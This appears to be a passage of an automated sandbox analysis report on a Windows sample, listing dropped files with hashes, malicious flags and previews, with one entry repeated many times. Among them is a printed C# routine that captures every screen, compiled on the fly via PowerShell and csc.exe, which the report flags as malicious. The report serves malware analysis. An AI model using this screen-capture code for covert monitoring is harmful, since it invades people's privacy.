                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                                              Entropy (8bit):3.1042745148089197
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryimak7YnqqB3PN5Dlq5J:+RI+ycuZhNfakSRPNnqX
                                                                                                                                                                                                                                              MD5:031B2D1AB373BD46DCA2BD5CF52C5A75
                                                                                                                                                                                                                                              SHA1:C7312AFDC3C296AF0CFF428E86ADE96BDA9F4578
                                                                                                                                                                                                                                              SHA-256:4970695F7CD3C53C131566AC0514D96CD9EE2DACED2BEDEE736F412FD41FF8AB
                                                                                                                                                                                                                                              SHA-512:D01E60410F7716AC846D44ED3D85102556F9D2040AF329578806A22E94A68FA8951EE5EB009C15A1AAE6888FA0CE67CB7865311E47A06A6553E9F686ED4F2373
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1004
                                                                                                                                                                                                                                              Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                              MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                              SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                              SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                              SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (606), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):609
                                                                                                                                                                                                                                              Entropy (8bit):5.36138611280312
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5923fT:p37Lvkmb6KOkqe1xBkrk+ikqOWZE2D
                                                                                                                                                                                                                                              MD5:A44DCC242B707B5EB50853A106098165
                                                                                                                                                                                                                                              SHA1:9000DD3ECA762AF8AEA7593E1EFD8A05B156F3AD
                                                                                                                                                                                                                                              SHA-256:9AA342D0C57D242F47BA552BBAB581A0DEAB4376226264140FA9C6DCED57B4B8
                                                                                                                                                                                                                                              SHA-512:5B4F15F00391E10D3C84EA4609982590E788B15A2965C43793988A69AB9B97A29E3BC63AD6AEBBFE9F9613FC7C2EE26A52C254B3E096BB05B57A054919201271
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.0.cs"
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                                                              Entropy (8bit):3.159635698934148
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:6n7oEAtf0KhzBU/9f6mtJKN00pW1ulfa3jq:5Nz0EmCOStK
                                                                                                                                                                                                                                              MD5:E0444FDA2C0A79C52FC54B8B9C52FDA5
                                                                                                                                                                                                                                              SHA1:51BD6EE39B0F273A90F909E8199857DF8DA2A5D0
                                                                                                                                                                                                                                              SHA-256:355EBF6333E561CE59ED6217FB6F1F688D23E451CEC35F51E48AD78AB6576F0D
                                                                                                                                                                                                                                              SHA-512:EDD3EDA629A2546F84B2783108E3B0492E99FA7B1E1F5F34FA75AC97FEEAA1EA610BABB7B153C2785D728EE9CE56887FCFFE9BEA9044C1E3F74F317F69149FE1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (711), with CRLF, CR line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):1150
                                                                                                                                                                                                                                              Entropy (8bit):5.501674701850705
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:KLaRId3ka6KOkqeFkqPE2iKax5DqBVKVrdFAMBJTH:2kkka6NkqeFkqPE2iK2DcVKdBJj
                                                                                                                                                                                                                                              MD5:728A46B212A8585A77F6FFD46AEF658E
                                                                                                                                                                                                                                              SHA1:349A739E72CFE07A6706613574658C7A0ECC3A1C
                                                                                                                                                                                                                                              SHA-256:392D3061E941E55050BFC62DECB43D87ED35983BC405A9209ABC120D8974AC2F
                                                                                                                                                                                                                                              SHA-512:198CDE38787EB6F56DDAF3F2618B707B4EAB5F778A40F777567410EF09DAB9751CC8ECE280BECA9435A32677A7C06272D338A6D0CFFB2A3136A5615038BD54DE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no long
                                                                                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                                                              Entropy (8bit):3.290401952603433
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:Fl2jCyIKr59vk6Xf0XLXhchXtXCXdblXrXDXCReVmoR:FeCyIKr59vk6Xf0XLXh4XtXCXdRXrXDJ
                                                                                                                                                                                                                                              MD5:C7BF9B6735FF9A45F2EE2658ADDEDB01
                                                                                                                                                                                                                                              SHA1:87FF02F09934D26F92A753C9E9BC0BBB02900570
                                                                                                                                                                                                                                              SHA-256:07B392A8A79F7E24B0ABF11C034BC068F2B710D5E55AA7C3E9E96CF1EEA53735
                                                                                                                                                                                                                                              SHA-512:15F82059BC7D40BA3577ACF8CDA1F1410F4FB61806808E5D538757DEDBA6DFDEF71FD5E043A7C06F6910524D2D5884DE0FB603063EE9BF0AAA9343F5289B1211
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:....P...P.......................................P...!...............................p...:!.....................eJ.......X.Fc..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W...............[xsFc..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.1.0...0.5.0.0.1.7...3.5.2...1...e.t.l.......P.P.....p...:!.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):17126
                                                                                                                                                                                                                                              Entropy (8bit):7.3117215578334935
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                                                                                                                                                                                                                                              MD5:1B6460EE0273E97C251F7A67F49ACDB4
                                                                                                                                                                                                                                              SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                                                                                                                                                                                                                                              SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                                                                                                                                                                                                                                              SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*
                                                                                                                                                                                                                                              Process:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24490
                                                                                                                                                                                                                                              Entropy (8bit):7.629144636744632
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
